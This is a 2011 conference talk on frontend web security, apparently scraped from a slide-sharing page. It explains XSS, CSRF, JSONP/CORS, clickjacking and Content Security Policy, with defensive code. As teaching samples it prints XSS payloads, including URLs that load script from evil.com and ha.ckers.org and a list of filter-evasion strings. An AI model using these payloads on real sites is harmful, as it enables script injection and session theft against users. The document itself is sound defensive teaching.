Web security in the frontend
Framsia
H2011 – Erlend Oftedal
Who am I?
 Developer
 Head of the security competency group at BEKK
 Chapter lead of the OWASP Norway chapter
 Member of the Norwegian Honeynet project
 erlend.oftedal@bekk.no
 @webtonull
 http://erlend.oftedal.no/blog
DEMO: HTML5 validation
HTML5 validation?
 Client side validation of data sent to server
 Improves usability
 Has nothing to do with security: the attacker does not use your form, but sends the request directly with the validation removed
Cross Site Scripting - XSS
 One of the most common problems
 OWASP Top 10 2004, 2007, 2010
http://info.veracode.com/rs/veracode/images/soss-v3.pdf
Cross site scripting
Drawing by @johnwilander
Reflected
DEMO: Reflected XSS
Stored
DEMO: Persistent/stored XSS
DOM-based
DEMO: DOM-based XSS
DOM-based
 http://www.server.com/#banner=2011
 Would you click:
 http://server.com/#banner=2011<script src="http://evil.com/"></script>
 http://server.com/#banner=2011%3Cscript%20src%3D%22http%3A//evil.com/%22%3E%3C/script%3E
 http://bit.ly/vH6d6w
 (The same payload three times, each time better disguised: plain, URL-encoded, and hidden behind a URL shortener)
Not sent to server: the fragment (everything after #) stays in the browser, so server-side filters, WAFs and access logs never see the payload
Example
 $(location.hash)
 $("#<script>alert(1)</script>")
 jQuery up to 1.6.2 treated a string like this as HTML rather than as a selector (1.6.3 changed the handling of $(location.hash)), so the fragment was parsed into DOM nodes; with an <img onerror=...> payload the handler fires as soon as the element is created
 http://codesearch.google.com/codesearch?as_q=%22%24%28location.hash%29%22
http://ma.la/jquery_xss/
Twitter September 2010
(function(g) {
var a = location.href.split("#!")[1];
if(a){
g.location = a;
}
})(window);
Goal:
https://twitter.com/#!/framsia
https://twitter.com/framsia
http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html
Twitter September 2010
https://twitter.com/#!javascript:alert(1)
g.location = "javascript:alert(1)"
Not sent to server
First attempt to patch
var c = location.href.split("#!")[1];
if(c) {
window.location = c.replace(":", "");
} else {
return true;
}
replace() with a string pattern replaces only the first occurrence of the search string.
But...
https://twitter.com/#!javascript::alert(1)
"javascript::alert(1)".replace(":", "") gives "javascript:alert(1)", which is still a javascript: URL
2nd attempt
(function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location = a.replace(/:/gi, "");
}
})(window);
But...
http://twitter.com/#!javascript&#58;alert(1)
Working patch
(function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location.pathname = a;
}
})(window);
Assigning to location.pathname instead of location means the value can only ever be a path on the current origin; it cannot introduce a scheme such as javascript: or point the browser at another host
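The Twitter fixes above, as an added example that is not Twitter's code and not part of the slides: the original assignment, the first patch and the working patch are modelled with the WHATWG URL API so they can be run outside a browser. The base URL, the fragments and the isSafeTarget() check are constructed for the example; in a page, `location` behaves the same way as the URL object here.

```javascript
// Added example (not Twitter's code): the fixes from the slides modelled with the
// WHATWG URL API. BASE stands in for location.href of the page; the "#!..." inputs
// are constructed test values.
const BASE = "https://twitter.com/";

// Extract the part after "#!", exactly as Twitter's snippet did.
function hashBang(href) {
  return href.split("#!")[1];
}

// Original code: g.location = a -> the fragment is resolved as a complete URL,
// so a "javascript:" scheme (or a "//other-host" reference) is honoured.
function resolveAsLocation(href) {
  const a = hashBang(href);
  return a ? new URL(a, BASE).href : null;
}

// First patch: strip the first ":" only (String.prototype.replace with a string
// pattern), so "javascript::alert(1)" still ends up as "javascript:alert(1)".
function resolveFirstPatch(href) {
  const a = hashBang(href);
  return a ? new URL(a.replace(":", ""), BASE).href : null;
}

// Working patch: g.location.pathname = a -> the value can only be a path on the
// current origin. The pathname setter never changes scheme or host.
function resolveAsPathname(href) {
  const a = hashBang(href);
  if (!a) return null;
  const u = new URL(BASE);
  u.pathname = a;
  return u.href;
}

// Check used to judge the outcomes: staying on https://twitter.com is the only
// acceptable result; "javascript:" means script execution, another host means an
// open redirect.
function isSafeTarget(resolved) {
  const u = new URL(resolved);
  return (u.protocol === "https:" || u.protocol === "http:") && u.host === "twitter.com";
}
```

The same URL object also shows why the pathname fix is more than a javascript: filter: a fragment of `//evil.example/` resolves to another host when assigned to `location`, but becomes the harmless path `//evil.example/` on twitter.com when assigned to `location.pathname`.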
HTML5 - Browser Storage
 Persistent DOM-based XSS: a payload stored in localStorage (or sessionStorage) and later read back into the DOM with innerHTML or $().html() fires on every page load, and never passes through the server
Is it really all that dangerous?
DEMO: BeEF
http://telenorsoc.blogspot.com/2008/10/malware-og-drive-by-exploits.html
How do we stop it?
The same origin policy
<script>
<iframe src="http://mail.google.com">
</iframe>
Script on your page may not read the DOM of a cross-origin iframe, but the same origin policy says nothing about script injected into your own origin: an XSS payload runs with exactly the privileges of your page
Is input validation enough?
 How do you validate an email address?
 [a-z]+@[a-z]+\.[a-z]{2,3}
 [a-zA-ZæøåÆØÅ'.-]+@[a-z0-9.-]+\.[a-z]{2,3}
From Wikipedia (RFC 5322 Section 3.2.3)
 The local-part of the email address may use any of these ASCII characters:
– Uppercase and lowercase English letters (a–z, A–Z) (ASCII: 65-90, 97-122)
– Digits 0 to 9 (ASCII: 48-57)
– Characters !#$%&'*+-/=?^_`{|}~ (ASCII: 33, 35-39, 42, 43, 45, 47, 61, 63, 94-96, 123-126)
– Character . (dot, period, full stop) provided that it is not the first or last character, and provided also that it does not appear two or more times consecutively (e.g. John..Doe@example.com).
– Special characters are allowed with restrictions (inside a quoted string) including: space and "(),:;<>@[] (ASCII: 32, 34, 40, 41, 44, 58, 59, 60, 62, 64, 91-93)
From Wikipedia
 Valid email addresses
– niceandsimple@example.com
– a.little.unusual@example.com
– much."more unusual"@example.com
– very.unusual."@".unusual.com@example.com
– very."(),:;<>[]".VERY."very @"very".unusual@cool.example.com
Input validation is not enough!
 A validator that accepts every RFC-valid address has to accept " < > ( ) and friends, so whatever passes it still needs encoding on output
 How would you avoid XSS on Stack Overflow?
 Do you really expect the user to write HTML entities like &gt; and &lt;?
– User friendly?
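The email argument above, as an added example that is not part of the slides: the two validators from the slide (with the escaping of "." restored) are run against the Wikipedia list of valid addresses, and a deliberately loose structural check shows that a syntactically valid address can still carry HTML. The address list, the regexes and isPlausibleEmail() are constructed for the example; the last address is adapted from the slide's.

```javascript
// Added example, not from the slides. Constructed test data: the two validators
// shown on the slide and Wikipedia's valid addresses (last one adapted).
const SIMPLE = /^[a-z]+@[a-z]+\.[a-z]{2,3}$/;
const WIDER = /^[a-zA-ZæøåÆØÅ'.-]+@[a-z0-9.-]+\.[a-z]{2,3}$/;

const VALID_ADDRESSES = [
  "niceandsimple@example.com",
  "a.little.unusual@example.com",
  'much."more unusual"@example.com',
  'very.unusual."@".unusual.com@example.com',
  'very."(),:;<>[]".VERY."very @very".unusual@cool.example.com',
];

// Which of the valid addresses does a validator wrongly reject?
function rejectedBy(re, addresses = VALID_ADDRESSES) {
  return addresses.filter((a) => !re.test(a));
}

// Characters that matter in an HTML, attribute or JavaScript context. Any validator
// that accepts every RFC 5322 address must let these through.
const HTML_SIGNIFICANT = /[<>"'&]/;

function withHtmlSignificantChars(addresses = VALID_ADDRESSES) {
  return addresses.filter((a) => HTML_SIGNIFICANT.test(a));
}

// What validation is good for: rejecting obviously broken input early, without
// rejecting real users. This check accepts every address above, and therefore also
// accepts a quoted local-part containing "<script>"; encoding on output is what
// stops that from becoming XSS.
function isPlausibleEmail(addr) {
  const at = addr.lastIndexOf("@");
  if (at <= 0 || at === addr.length - 1) return false;
  const domain = addr.slice(at + 1);
  return /^[a-z0-9-]+(\.[a-z0-9-]+)+$/i.test(domain);
}
```

The slide's first regex rejects four of the five valid addresses, the second still rejects three, and the only way to stop rejecting real users is to let characters such as `"`, `<` and `>` through, which is the case for input validation being a usability feature and output encoding being the security control.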
Contextual encoding
 OWASP XSS Prevention cheat sheet
– Between HTML tags – HTML entity encoding &#nn;
– In HTML attributes – HTML attribute encoding &#nn; (and always quote the attribute)
– In JavaScript strings – JavaScript encoding \xnn (or \uXXXX)
– In CSS – CSS hex encoding \nnnnnn
– In URLs – URL encoding %nn
Contextual encoding is important!
<html>
<body>
<script>
var a = "</script><script>alert(1)</script>";
</script>
</body>
</html>
The HTML parser ends the script element at the first </script> it sees, whatever the JavaScript string context; inside a script block the data needs JavaScript encoding (\x3c), because entities such as &lt; are not decoded there
Simple HTML encoding is not enough
<img class="profile" src="http://..."
onmouseover="showUserProfile('bob&#39;); alert(&#39;1')">
The attribute value is entity-decoded before the handler runs, so &#39; becomes ' and closes the JavaScript string; data inside an event handler needs JavaScript encoding first, then HTML attribute encoding on the result
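The two breakouts above, as an added example that is not part of the slides and is not the jQuery Encoder plugin: a small contextual encoder in the spirit of the OWASP XSS Prevention Cheat Sheet, applied to a user value inside a script block and to a user value inside an inline event handler. The function names, the payloads and the decodeEntities()/jsLiteralRoundTrip() helpers are constructed for the example.

```javascript
// Added example, not from the slides: contextual encoders and the two cases above.

// Between tags: numeric entities for everything except alphanumerics and a few
// marks that carry no meaning in HTML.
function encodeForHTML(s) {
  return String(s).replace(/[^A-Za-z0-9 ,._-]/gu, (c) => `&#${c.codePointAt(0)};`);
}

// Inside a quoted attribute value: stricter, everything except alphanumerics.
function encodeForHTMLAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => `&#${c.codePointAt(0)};`);
}

// Inside a JavaScript string literal: \xHH / \uHHHH escapes for everything except
// alphanumerics. No "<", "/", quote or backslash survives, so neither the string
// literal nor the surrounding <script> element can be closed early.
function encodeForJavaScript(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// In a URL query parameter: percent-encoding.
function encodeForURL(s) {
  return encodeURIComponent(String(s));
}

// Case 1 from the slide: user data inside a <script> block. HTML encoding would
// corrupt the value (no entity decoding inside <script>); JavaScript encoding keeps
// the data intact and removes the "</script>" breakout.
function scriptBlock(userData) {
  return '<script>var a = "' + encodeForJavaScript(userData) + '";</script>';
}

// Case 2 from the slide: user data inside an inline event handler. The browser
// entity-decodes the attribute before running it, so attribute encoding alone is
// undone; encode for JavaScript first, then for the attribute.
function profileImage(userName) {
  const js = "showUserProfile('" + encodeForJavaScript(userName) + "')";
  return '<img class="profile" src="http://..." onmouseover="' + encodeForHTMLAttribute(js) + '">';
}

// Helpers for checking the result: the entity decoding a browser performs on an
// attribute value, and a JavaScript-literal round trip proving the encoding is lossless.
function decodeEntities(s) {
  return s.replace(/&#(\d+);/g, (_, n) => String.fromCodePoint(Number(n)));
}
function jsLiteralRoundTrip(s) {
  return new Function("return '" + encodeForJavaScript(s) + "';")();
}
```

The order in case 2 is the whole point: what the JavaScript engine eventually sees is the attribute after entity decoding, so the innermost context (the JavaScript string) is encoded first and the outer context (the attribute) last.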
Allowing some HTML tags?
 Use a well-tested whitelist based policy engine
– Specify allowed tags and allowed attributes
– Canonicalization
 Suggestions
– OWASP AntiSamy
– HtmlPurifier
Why you do NOT write your own HTML-cleaner/sanitizer
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>
<META HTTP-EQUIV="Set-Cookie"
Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
¼script¾alert(¢XSS¢)¼/script¾
<charset="x-mac-farsi">☼script ☾alert(1)//☼/script ☾
http://ha.ckers.org/xss.html
jQuery Encoder
 $.encoder.canonicalize()
 $.encoder.encodeForCSS()
 $.encoder.encodeForHTML()
 $.encoder.encodeForHTMLAttribute()
 $.encoder.encodeForJavaScript()
 $.encoder.encodeForURL()
 http://github.com/chrisisbeef/jquery-encoder
Avoiding DOM based XSS
 Beware of potential attacker controlled data
– window.name
– document.referrer
– window.location.hash (and the rest of location: search, pathname)
– postMessage data, browser storage and anything else that did not come from your own code
Coding principles
 JSON from XHR should be JSON encoded – no HTML encoding (encode when the value goes into the page, not when it is serialised)
 Beware of the semantics – jQuery:
 Use $("...").text(value) instead of $("...").html(value)
 Use .attr() to add attributes (but still validate URL attributes: .attr("href", value) happily accepts javascript:)
 Use .css() to modify CSS
 URL-encode before putting data in URLs (encodeURIComponent() for parameter values)
 Never ever put user data inside:
– eval(string) – are you sure that's JSON and not just JS? Use JSON.parse()
– setInterval(string, t)
– setTimeout(string, t)
– new Function(string)
Coding principles
 If you are using a templating engine like Mustache, check:
– When is data escaped?
– How is it escaped?
– For what?
– Test it!
DEMO: DOMinator
CSRF
 Cross Site Request Forgery
 One-click attack, session riding
 The browser attaches the victim's cookies to any request to the bank, no matter which page triggered it
DEMO: CSRF demo (GET + POST)
CSRF - Overview
1. User logs in to the Bank
2. User loads content from an infected server
3. The page contains a hidden script (or auto-submitting form)
4. The browser sends "pay bill to attacker's account" to the Bank, with the user's session cookie attached
Stopping CSRF
 Explicit verification before performing an action
– CAPTCHA
– Re-authentication
 One-time password before paying bills
CSRF – Token
1. GET /pay
2. 200 OK - <form...><input name="token" value="x123LKJ23">
3. POST /pay – token=x123LKJ23
4. 200 OK
The Bank stores Token=x123LKJ23 for session x and compares: x123LKJ23 == x123LKJ23. The infected server never sees the token, because the same origin policy stops it from reading the Bank's form.
CSRF – Bad token
0. Login
1. Load content from the infected server
2. Page with hidden script and form: <form...><input name="token" value="XYZZ..." >
3. POST /pay – token=XYZZ...
4. 400 Bad request
For session x the Bank holds Token=9992812jabc, and 9992812jabc != XYZZ...
DEMO: CSRF Token protection demo
Cross Domain Data
 Proxy
 JSONP
 CORS
Proxy
 Client asks server
 Server asks target
 Target returns data to server
 Server returns data to client
 Allows server to inspect/reject data
 Does not circumvent the Same Origin Policy
 Cannot directly reuse current authentication
JSONP
 Page from server A adds a script-tag to target server B
 Server B (hopefully) returns JSON data wrapped in a callback function:
callback({"id":0, ...})
 Page from server A defines a function with the same name as the callback function, and receives the data
 Can leverage current authentication
 Any webpage can include the same script tag and the same callback and thus potentially steal the data
 Server B can misbehave and send other types of javascript (XSS)
 No easy way to protect POST requests from CSRF
 => Insecurely circumventing the Same Origin Policy
CORS – Cross Origin Resource Sharing
 Standards-defined secure way to do cross domain requests from the browser
 Types (both from the HTML5/W3C work; strictly speaking postMessage is cross-document messaging and only cross domain XHR is CORS proper):
– postMessage
– Cross Domain XHR
CORS - postMessage
 Webpage from server A includes a (hidden) iframe to target server B
 JavaScript on page from A invokes postMessage on the iframe:
iframe.contentWindow
.postMessage("some data", "http://serverB")
 Page in iframe from server B defines an event handler:
$(window).bind("message", function(e) {
var event = e.originalEvent;
if (event.origin == "http://serverA") {
//process event.data
}
});
 Remember to check the origin of an event, and compare it exactly (scheme, host and port), not with indexOf or an unanchored regex
 Don't be tempted to specify "*" as the second parameter to postMessage: the target origin is what stops your data from being delivered to whatever has been navigated into the frame
Cross Domain XHR
 $.getJSON("http://serverB/someService",
function(data) {
//handle data
});
 Server B returns the data with a specific response header:
Access-Control-Allow-Origin: http://serverA
 Once again, do not use * unless you want the data to be available to every site on the web; if the request carries cookies (withCredentials) the browser refuses * anyway
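Both cross-origin channels above (the postMessage handler and the CORS response header) need the same decision, "is this origin one I trust?", so this added example, which is not part of the slides, shares one exact-match allowlist between them. The origins, the message shape ("lookup" / "lookup-result") and the request inputs are constructed for the example.

```javascript
// Added example, not from the slides: one origin allowlist reused by a postMessage
// handler on server B and by server B's CORS header logic. Constructed inputs.
const TRUSTED_ORIGINS = new Set(["https://servera.example", "https://app.servera.example"]);

// An origin is scheme + host + port compared as one string. Anything looser
// (indexOf, startsWith, an unanchored regex) lets https://servera.example.evil.test
// or http://servera.example through.
function isTrustedOrigin(origin) {
  return typeof origin === "string" && TRUSTED_ORIGINS.has(origin);
}

// Page in the iframe on server B: act only on messages from a trusted origin, and
// only on the message shape we expect. Returns the reply, or null to ignore.
function handleMessage(event) {
  if (!isTrustedOrigin(event.origin)) return null;
  let msg;
  try {
    msg = typeof event.data === "string" ? JSON.parse(event.data) : event.data;
  } catch (_) {
    return null;
  }
  if (!msg || typeof msg !== "object" || msg.type !== "lookup") return null;
  return { type: "lookup-result", id: String(msg.id) };
}

// Server B deciding the CORS headers for a request that carries an Origin header.
// null means "no CORS headers": the browser then blocks the cross-origin read.
function corsHeadersFor(requestOrigin, { withCredentials = false } = {}) {
  if (!isTrustedOrigin(requestOrigin)) return null;
  const headers = {
    "Access-Control-Allow-Origin": requestOrigin, // echo the allowlisted origin, never "*"
    "Vary": "Origin", // the response differs per origin, so caches must key on it
  };
  if (withCredentials) headers["Access-Control-Allow-Credentials"] = "true";
  return headers;
}
```

Echoing the request's Origin header back only after it has matched the allowlist is what makes the per-origin header safe; echoing it unconditionally is the same as `*` with credentials added, which the browser would otherwise refuse.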
DEMO
CORS DEMO (XHR + postMessage)
Important regardless of choice
 Agree on type of encoding – prefer JSON with no other encoding
 Remember – if you allow HTML, you open for XSS
DEMO: Video of XSS via twitter feed
Clickjacking
 User does not click on what he/she thinks
 Hidden (transparent) iframe of the target site positioned over a decoy page
 Like-jacking
DEMO: Clickjacking demo
http://amolnaik4.blogspot.com/2011/09/hijacking-2-clicks-in-google-accounts.html
Advanced clickjacking
 Exploiting drag-n-drop to steal content
 User drags a ball into a basket
– In reality selects text and drops it in a textarea
Anti-clickjacking
 Javascript framebusting
 Response header
X-Frame-Options: sameorigin
X-Frame-Options: deny
 Javascript framebusting can be circumvented (for example by sandboxing the iframe so it cannot navigate the top window, or by trapping the navigation with onbeforeunload), so send the header and keep the script only as a fallback for old browsers
 X-Frame-Options is only supported in newer browsers
– IE8 was the first one
– IE also supports X-Frame-Options: allow-from <domains>
DEMO: Anti-clickjacking via X-Frame-Options
EcmaScript 5 – defineProperty
 Object.defineProperty(object, propertyName, {
get: function() { ... },
set: function(value) { ... },
configurable: boolean
})
 With configurable: false the accessor can no longer be deleted or redefined by scripts that run later
DEMO: Blocking calls to document.cookie from JS
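The demo above, as an added example that is not the code shown in the talk: a cookie-like accessor is replaced with a non-configurable one, and the reads, writes, redefinition and deletion an injected script would attempt are reported as outcomes. `doc` is a plain object standing in for `document` so the code runs outside a browser; makeDocument(), blockCookieAccess() and attemptReadWriteRedefine() are constructed for the example.

```javascript
// Added example, not from the talk: locking down a cookie accessor with
// Object.defineProperty. `doc` is a plain object standing in for `document`.
function makeDocument(initialCookie) {
  let jar = initialCookie; // what a real browser keeps in its cookie store
  const doc = {};
  Object.defineProperty(doc, "cookie", {
    get() { return jar; },
    set(v) { jar = v; },
    configurable: true, // a normal, overridable accessor, like a fresh document
  });
  return doc;
}

// Replace the accessor: reads return "" and writes are dropped. configurable:false
// freezes the definition, so a later script cannot delete it or define it again to
// get the real accessor back.
function blockCookieAccess(doc) {
  Object.defineProperty(doc, "cookie", {
    get() { return ""; },
    set(_v) { /* dropped */ },
    configurable: false,
    enumerable: false,
  });
  return doc;
}

// What an injected script would try, returned as outcomes rather than thrown.
function attemptReadWriteRedefine(doc) {
  const read = doc.cookie;
  doc.cookie = "stolen=1";
  let redefined;
  try {
    Object.defineProperty(doc, "cookie", { get() { return "real"; }, configurable: true });
    redefined = true;
  } catch (e) {
    redefined = false; // TypeError: Cannot redefine property
  }
  let deleted;
  try {
    deleted = delete doc.cookie; // false in sloppy mode, throws in strict mode
  } catch (e) {
    deleted = false;
  }
  return { read, afterWrite: doc.cookie, redefined, deleted };
}
```

In a real page the original accessor lives on Document.prototype, and a script that runs first can take a copy of it with Object.getOwnPropertyDescriptor or obtain a fresh document through a same-origin iframe, so this is hardening against casual payloads, not a security boundary; cookies that script never needs should be HttpOnly, which the browser enforces.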
HTML5 – SVG
http://www.owasp.org/images/a/aa/The_image_that_called_me.pdf
 Scalable Vector Graphics
– Image format
– Allows for scripting
– XML-based
– Can be declared inline
– <html>...<div>...<svg>...
 Countless XSS bugs in browser implementations
SVG favicon
 SVG favicon overlaying the chrome of Opera
Picture by Mario Heiderich @0x6D6172696F
Content Security Policy
Mozilla CSP - Content Security Policy
• Now being standardised by the W3C
• header based - server instructs browser
• policies for javascript, frames, images, style etc.
X-Content-Security-Policy: allow *; script-src 'self'
X-Content-Security-Policy: allow *; script-src 'self' *.google.com https://*.nordea.no:443
X-Content-Security-Policy: allow *; script-src 'self'; options inline-script eval-script
(Mozilla's original syntax: in the W3C version the header is Content-Security-Policy, allow became default-src, and the options directive became the 'unsafe-inline' and 'unsafe-eval' keywords inside script-src)
https://wiki.mozilla.org/Security/CSP/Spec
Content Security Policy
 First version came in Firefox 4
– FF7 and FF8beta ~80% compliant with current W3C spec
 Implemented in Chrome
– Completely broken in Chrome 15 – ~95% compliant in beta (16)
 By default disables javascript functions that build code from strings
eval(s), setTimeout(s,t), setInterval(s,t), new Function(s)
 Can (in the future) be used for clickjacking-defence:
frame-ancestors uri
DEMO: Content Security Policy demo
Other HTML5 features
 Check html5sec.org
 Test tool http://html5sec.org/innerhtml
Recommended books
Questions
Erlend Oftedal
erlend.oftedal@bekk.no
@webtonull
 People you should follow
@0x6D6172696F – HTML5 security
@johnwilander – RIA security
@wisecwisec – DOM based XSS
@garethheyes - XSS
@kkotowicz - Clickjacking

UiPath Test Automation using UiPath Test Suite series, part 2DianaGray10
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomCzechDreamin
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfFIDO Alliance
 
The Metaverse: Are We There Yet?
The  Metaverse:    Are   We  There  Yet?The  Metaverse:    Are   We  There  Yet?
The Metaverse: Are We There Yet?Mark Billinghurst
 
Strategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsStrategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsUXDXConf
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceSamy Fodil
 
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfThe Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfFIDO Alliance
 
Connecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKConnecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKUXDXConf
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxJennifer Lim
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutesconfluent
 

Recently uploaded (20)

AI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekAI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří Karpíšek
 
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya HalderCustom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
 
Buy Epson EcoTank L3210 Colour Printer Online.pptx
Buy Epson EcoTank L3210 Colour Printer Online.pptxBuy Epson EcoTank L3210 Colour Printer Online.pptx
Buy Epson EcoTank L3210 Colour Printer Online.pptx
 
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfWhere to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
 
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
 
Intro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераIntro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджера
 
Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
 
What's New in Teams Calling, Meetings and Devices April 2024
What's New in Teams Calling, Meetings and Devices April 2024What's New in Teams Calling, Meetings and Devices April 2024
What's New in Teams Calling, Meetings and Devices April 2024
 
UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
 
The Metaverse: Are We There Yet?
The  Metaverse:    Are   We  There  Yet?The  Metaverse:    Are   We  There  Yet?
The Metaverse: Are We There Yet?
 
Strategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsStrategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering Teams
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM Performance
 
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfThe Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
 
Connecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKConnecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAK
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutes
 

Web Application Security in front end

  • 1. Web security in the frontend – Framsia H2011 – Erlend Oftedal
  • 4. Who am I?
    – Developer
    – Head of the security competency group at BEKK
    – Chapter lead of the OWASP Norway chapter
    – Member of the Norwegian Honeynet project
    – erlend.oftedal@bekk.no, @webtonull, http://erlend.oftedal.no/blog
  • 11. ?
  • 12. Client side validation of data sent to server
    – Improves usability
    – Has nothing to do with security
  • 13. Cross Site Scripting – XSS
    – One of the most common problems
    – OWASP Top 10 2004, 2007, 2010
    – http://info.veracode.com/rs/veracode/images/soss-v3.pdf
  • 14. Cross site scripting (drawing by @johnwilander)
  • 17. Stored (drawing by @johnwilander)
  • 18. Stored (drawing by @johnwilander)
  • 22. DOM-based
    – http://www.server.com/#banner=2011
    – Would you click:
      – http://server.com/#banner=2011<script src="http://evil.com/"></script>
      – http://server.com/#banner=2011%3Cscript%20src%3D%22http%3A//evil.com/%22%3E%3C/script%3E
      – http://bit.ly/vH6d6w
    – Not sent to server
  • 23. Example
    – $(location.hash)
    – $("#<script>alert(1)</script>")
    – http://codesearch.google.com/codesearch?as_q=%22%24%28location.hash%29%22
    – http://ma.la/jquery_xss/
  • 24. Twitter September 2010
      (function(g) {
        var a = location.href.split("#!")[1];
        if (a) {
          g.location = a;
        }
      })(window);
    – Goal: https://twitter.com/#!/framsia should end up at https://twitter.com/framsia
    – http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html
  • 25. Twitter September 2010
    – https://twitter.com/#!javascript:alert(1)
    – g.location = "javascript:alert(1)"
    – Not sent to server
  • 26. First attempt to patch
      var c = location.href.split("#!")[1];
      if (c) {
        window.location = c.replace(":", "");
      } else {
        return true;
      }
    – Replaces only the first occurrence of the search string.
  • 28. 2nd attempt
      (function(g) {
        var a = location.href.split("#!")[1];
        if (a) {
          g.location = a.replace(/:/gi, "");
        }
      })(window);
  • 30. Working patch
      (function(g) {
        var a = location.href.split("#!")[1];
        if (a) {
          g.location.pathname = a;
        }
      })(window);
